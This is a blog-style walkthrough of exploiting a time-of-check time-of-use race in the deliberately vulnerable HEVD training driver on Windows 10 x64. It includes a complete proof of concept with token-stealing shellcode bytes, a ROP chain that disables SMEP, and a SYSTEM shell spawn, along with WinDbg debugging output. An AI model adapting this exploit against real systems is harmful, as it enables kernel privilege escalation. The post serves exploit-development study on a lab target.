Windows 10 x64 Kernel Exploitation - Time-of-Check Time-of-Use (TOCTOU) Race Condition using HEVD
Looking at the Vulnerability
If we look at the TriggerDoubleFetch
function within the HEVD driver with Binary Ninja, we can see it's a stack buffer overflow like the first blog post, except this time with a check added to ensure the buffer passed from userland is <= 0x800.
However, between the time-of-check (TOC) and time-of-use (TOU), the UserDoubleFetch->Size
value could change, which makes the code vulnerable to a TOCTOU race condition.
Trigging the TOCTOU Race
I thought this would be difficult since the TOCTOU is only a couple assembly instructions, which would execute within a few nanoseconds. But it turns out its not too bad, you just need, at a minimal, two threads, one consistently calling DeviceIoControl
with a small buffer size that passes the check, and one that's switching the buffer size to a bigger value. The example below uses 5 threads doing each, but I got it working with NUM_THREADS
set to 1
.
Some people do fancy stuff like lock the threads to different CPU cores, or change process priority, but I didn't need this, and didn't want to since the code needs to run as a low privileged user and these APIs should require privileges like SeIncreaseBasePriorityPrivilege
.
#include <Windows.h>
#include <stdio.h>
#include <string.h>
typedef unsigned long long u64;
typedef struct _DOUBLE_FETCH {
PVOID Buffer;
SIZE_T Size;
} DOUBLE_FETCH, *PDOUBLE_FETCH;
typedef struct _IRP_ARGS {
HANDLE hHEVD;
DOUBLE_FETCH pDoubleFetch;
} IRP_ARGS, *PIRP_ARGS;
#define ArraySize(x) (sizeof x / sizeof x[0])
#define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D)
#define NUM_THREADS 5
#define BUFFER_SIZE 2500
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {
PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;
while (1) {
pIRPArgs->pDoubleFetch.Size = 0x10;
DWORD dwBytesReturned = 0;
DeviceIoControl(
pIRPArgs->hHEVD,
HEVD_IOCTL_DOUBLE_FETCH,
&pIRPArgs->pDoubleFetch,
sizeof(DOUBLE_FETCH),
NULL,
0x00,
&dwBytesReturned,
NULL);
Sleep(1);
}
return 0;
}
DWORD WINAPI SizeChaingingThread(LPVOID lpParameters) {
PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;
while (1) {
pIRPArgs->pDoubleFetch.Size = BUFFER_SIZE;
Sleep(1);
}
return 0;
}
int main(void) {
HANDLE hHEVD = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (!hHEVD) ExitProcess(1);
PVOID buffer = VirtualAlloc(NULL, BUFFER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!buffer) ExitProcess(1);
memset(buffer, 'A', BUFFER_SIZE);
IRP_ARGS pIRPArgs = {
.hHEVD = hHEVD,
.pDoubleFetch.Buffer = buffer,
.pDoubleFetch.Size = 0,
};
HANDLE hThreadWork[NUM_THREADS] = { 0 };
HANDLE hThreadRace[NUM_THREADS] = { 0 };
for (u64 i = 0; i < NUM_THREADS; i++) {
hThreadWork[i] = CreateThread(NULL, 0, DeviceIoControlThread, &pIRPArgs, 0, NULL);
hThreadRace[i] = CreateThread(NULL, 0, SizeChaingingThread, &pIRPArgs, 0, NULL);
}
Sleep(30000);
for (u64 i = 0; i < NUM_THREADS; i++) {
if (hThreadWork[i] != NULL) {
TerminateThread(hThreadWork[i], 0);
CloseHandle(hThreadWork[i]);
}
if (hThreadRace[i] != NULL) {
TerminateThread(hThreadRace[i], 0);
CloseHandle(hThreadRace[i]);
}
}
return 0;
}
Getting RCE
This is exactly the same as the Stack Buffer Overflow post.
The full PoC:
#include <Windows.h>
#include <Psapi.h>
#include <stdio.h>
#include <string.h>
typedef signed char i8;
typedef short i16;
typedef int i32;
typedef long long i64;
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef struct _DOUBLE_FETCH {
PVOID Buffer;
SIZE_T Size;
} DOUBLE_FETCH, *PDOUBLE_FETCH;
typedef struct _IRP_ARGS {
HANDLE hHEVD;
HANDLE hEvent;
DOUBLE_FETCH pDoubleFetch;
} IRP_ARGS, *PIRP_ARGS;
#define ArraySize(x) (sizeof x / sizeof x[0])
#define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D)
#define NUM_THREADS 1
#define BUFFER_SIZE 2500
BOOL IsSYSTEM(void) {
char cUsername[256];
DWORD nameLen = sizeof(cUsername);
GetUserNameA(cUsername, &nameLen);
return strcmp(cUsername, "SYSTEM") == 0;
}
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {
PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;
while (1) {
pIRPArgs->pDoubleFetch.Size = 0x10;
DWORD dwBytesReturned = 0;
DeviceIoControl(
pIRPArgs->hHEVD,
HEVD_IOCTL_DOUBLE_FETCH,
&pIRPArgs->pDoubleFetch,
sizeof(DOUBLE_FETCH),
NULL,
0x00,
&dwBytesReturned,
NULL);
if (IsSYSTEM()) {
printf("Overflow triggered\n");
printf("DeviceIoControlThread thread exiting\n");
SetEvent(pIRPArgs->hEvent);
return 0;
}
Sleep(1);
}
return 0;
}
DWORD WINAPI SizeChaingingThread(LPVOID lpParameters) {
PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;
while (WaitForSingleObject(pIRPArgs->hEvent, 0) != WAIT_OBJECT_0) {
pIRPArgs->pDoubleFetch.Size = BUFFER_SIZE;
Sleep(1);
}
printf("SizeChaingingThread exiting\n");
return 0;
}
u64 GetKernelBaseAddress() {
LPVOID drivers[1024] = { 0 };
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return (u64)drivers[0];
}
int main(void) {
HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, NULL);
if (!hEvent) ExitProcess(1);
// 1. Setup Drive Handle
HANDLE hHEVD = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (!hHEVD) ExitProcess(1);
// 2. Setup Shellcode
unsigned char token_steal[] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04,
0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b,
0x88, 0xb8, 0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89,
0x88, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00,
0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01,
0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0xb8, 0x02, 0x00, 0x00, 0x00, 0x0f,
0x01, 0xf8, 0x48, 0x0f, 0x07
};
LPVOID shellcode = VirtualAlloc(NULL, sizeof(token_steal), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!shellcode) ExitProcess(1);
memcpy(shellcode, token_steal, sizeof(token_steal));
BOOL bLockRet = VirtualLock(shellcode, sizeof(token_steal));
if (!bLockRet) {
printf("VirtualLock failed with error %lx\n", GetLastError());
return 1;
}
// 3. Get Kernel Base
u64 kernelBase = (u64)GetKernelBaseAddress();
if (kernelBase == 0x00) return 1;
// 4. Setup buffer to send
PVOID buffer = VirtualAlloc(NULL, BUFFER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!buffer) ExitProcess(1);
// Setup ROP Chain
const u64 POP_RCX = kernelBase + 0x9b2952; // pop rcx; ret;
const u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;
const u64 offset = 2072;
u64* rop = (u64*)((u64)buffer + offset);
u64 index = 0;
*(rop + index++) = POP_RCX;
*(rop + index++) = 0xb50ef8 ^ 1UL << 20;
*(rop + index++) = MOV_CR4_RCX;
*(rop + index++) = (u64)shellcode;
// Trigger the overflow
IRP_ARGS pIRPArgs = {
.hHEVD = hHEVD,
.hEvent = hEvent,
.pDoubleFetch.Buffer = buffer,
.pDoubleFetch.Size = 0,
};
HANDLE hThreadWork[NUM_THREADS] = { 0 };
HANDLE hThreadRace[NUM_THREADS] = { 0 };
for (u64 i = 0; i < NUM_THREADS; i++) {
hThreadWork[i] = CreateThread(NULL, 0, DeviceIoControlThread, &pIRPArgs, 0, NULL);
hThreadRace[i] = CreateThread(NULL, 0, SizeChaingingThread, &pIRPArgs, 0, NULL);
}
printf("Waiting for the race to trigger...\n");
WaitForSingleObject(hEvent, INFINITE);
STARTUPINFOW si = { .cb = sizeof(STARTUPINFOW) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessW(L"C:\\Windows\\System32\\cmd.exe",
NULL, NULL, NULL, FALSE, 0, NULL, NULL,
&si, &pi))
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return 0;
}
Exactly-Once Delivery
Compared to the original triggering of the TOCTOU buffer overflow, I wanted to trigger it exactly once. The first step was to run a single SizeChaingingThread
thread and a single DeviceIoControlThread
thread. This makes controlling everything with thread synchronization primitives easier.
Then I needed a way to determine if a call to DeviceIoControl
had triggered the overflow. At first, I wanted to use the return value, I thought my shellcode could set eax
to something like 2 (because a BOOL
is really an int
) but for whatever reason, I never got the value stored in eax
back as the return value of DeviceIoControl
. Maybe some wrapper in NTDLL just changed it back to 1/0 to follow specification. NOTE: I realized while writing this blog I should have checked GetLastError
, ohh well.
My second idea was then to check if I had a SYSTEM
token. That actually requires a bunch of code (OpenProcessToken
, GetTokenInformation
, AllocateAndInitializeSid
, etc), so it's easier to just call GetUserNameA
and check for SYSTEM
. And this worked fine in the PoC above.
My last idea, was to actually write back into the UserDoubleFetch->Buffer
from the shellcode, and then after every DeviceIoControl
call, check the Buffer
. This is better because it saves calling GetUserNameA
thousands of times. Lets implement this!
Pass-Back the Result
During TriggerDoubleFetch
I took note of the UserDoubleFetch
address (0x00000034e331f828
) and UserDoubleFetch->Buffer
address (0x000002194edf0000
). Then once the exploit reached the shellcode, I needed to find one of these in the registers or on the stack. I managed to find the UserDoubleFetch
stored on the stack in a couple locations.
2: kd> s -q rsp l10000 0x00000034e331f828
ffff818c`82c2fa10 00000034`e331f828 00000000`00000010
ffff818c`82c2fa80 00000034`e331f828 00007ffb`00000010
ffff818c`82c2fc10 00000034`e331f828 00000000`000000e0
Now we can find the offset from rsp
.
2: kd> ? ffff818c`82c2fa10 - rsp
Evaluate expression: 744 = 00000000`000002e8
We have a pointer to the DOUBLE_FETCH
struct. Let's dereference that to get the struct data.
2: kd> dq rsp+2e8
ffff818c`82c2fa10 00000034`e331f828 00000000`00000010
So 00000034`e331f828
holds the struct data. The first element is the Buffer
, let's check.
2: kd> dq 00000034`e331f828
00000034`e331f828 00000219`4edf0000 00000000`000009c4
00000034`e331f838 00000000`00000000 00000000`00000010
So the Buffer
should be at 00000219`4edf0000
, let's have a look.
2: kd> dq 00000219`4edf0000
00000219`4edf0000 61413161`41306141 41346141`33614132
00000219`4edf0010 37614136`61413561 62413961`41386141
00000219`4edf0020 41326241`31624130 35624134`62413362
00000219`4edf0030 62413762`41366241 41306341`39624138
00000219`4edf0040 33634132`63413163 63413563`41346341
Yup that's our pattern, and 61413161`41306141
is offset 0.
So we can dereference rsp + 0x2e8
to get the DOUBLE_FETCH
struct, then dereference that value to get the Buffer
, and then dereference the Buffer
to write something at offset 0.
In assembly that would be:
mov rax, [rsp + 0x2e8] ; Load the first pointer (poi(rsp + 0x2e8)) into rax
mov rbx, [rax] ; Dereference rax to get the second pointer (poi(poi(rsp + 0x2e8)))
mov dword [rbx], 0xDEADBEEF ; Write 0xDEADBEEF to the address pointed to by rbx (poi(poi(rsp + 0x2e8)))
I added that assembly to the shellcode. Now the DeviceIoControlThread
function can be updated to the below, and we can correctly determine if the DeviceIoControl
call triggered an overflow and ran the shellcode by checking the value at pIRPArgs->pDoubleFetch.Buffer
. Which imo is nicer than spamming GetUserNameA
.
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {
PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;
while (1) {
pIRPArgs->pDoubleFetch.Size = 0x10;
DWORD dwBytesReturned = 0;
DeviceIoControl(
pIRPArgs->hHEVD,
HEVD_IOCTL_DOUBLE_FETCH,
&pIRPArgs->pDoubleFetch,
sizeof(DOUBLE_FETCH),
NULL,
0x00,
&dwBytesReturned,
NULL);
if (*(u32*)pIRPArgs->pDoubleFetch.Buffer == (u32)0xDEADBEEF) {
printf("Overflow triggered\n");
printf("DeviceIoControlThread thread exiting\n");
SetEvent(pIRPArgs->hEvent);
return 0;
}
//if (IsSYSTEM()) {
//printf("Overflow triggered\n");
//printf("DeviceIoControlThread thread exiting\n");
//SetEvent(pIRPArgs->hEvent);
//return 0;
//}
Sleep(1);
}
return 0;
}